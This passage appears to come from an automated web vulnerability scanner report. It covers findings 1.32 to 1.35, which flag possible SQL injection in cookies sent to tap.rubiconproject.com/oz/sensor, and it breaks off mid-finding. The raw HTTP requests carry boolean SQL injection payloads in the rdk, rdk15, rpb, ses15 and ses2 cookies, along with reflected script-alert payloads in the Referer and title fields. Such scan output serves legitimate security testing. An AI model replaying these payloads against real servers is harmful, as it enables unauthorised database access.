Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; dq=47|4|43|0; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/1195319874108'%20or%201%3d1--%20; rdk2=1; ses2=11953^37; csi2=1300433.js^1^1308237983^1308237983&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:27:27 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:27:26 GMT; Path=/
Set-Cookie: dq=49|4|45|0; Expires=Fri, 15-Jun-2012 15:27:26 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=93&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+27:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,burgeoning+u:40,11+billion:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; dq=47|4|43|0; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/1195319874108'%20or%201%3d2--%20; rdk2=1; ses2=11953^37; csi2=1300433.js^1^1308237983^1308237983&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:27:27 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.32. http://tap.rubiconproject.com/oz/sensor [rdk15 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rdk15 cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the rdk15 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=64&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; cd=false; dq=90|4|86|0; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0%20and%201%3d1--%20; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:11:40 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 16-Jun-2012 10:11:40 GMT; Path=/
Set-Cookie: dq=92|4|88|0; Expires=Sat, 16-Jun-2012 10:11:40 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=64&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; cd=false; dq=90|4|86|0; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0%20and%201%3d2--%20; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:11:40 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.33. http://tap.rubiconproject.com/oz/sensor [rpb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1'%20and%201%3d1--%20; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1'%20and%201%3d2--%20; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.34. http://tap.rubiconproject.com/oz/sensor [ses15 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The ses15 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ses15 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2'%20and%201%3d1--%20; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:18 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:09:19 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:09:19 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2'%20and%201%3d2--%20; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:19 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.35. http://tap.rubiconproject.com/oz/sensor [ses2 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The ses2 cookie appears to be vulnerable to SQL injection attacks. The payloads 20978879'%20or%201%3d1--%20 and 20978879'%20or%201%3d2--%20 were each submitted in the ses2 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

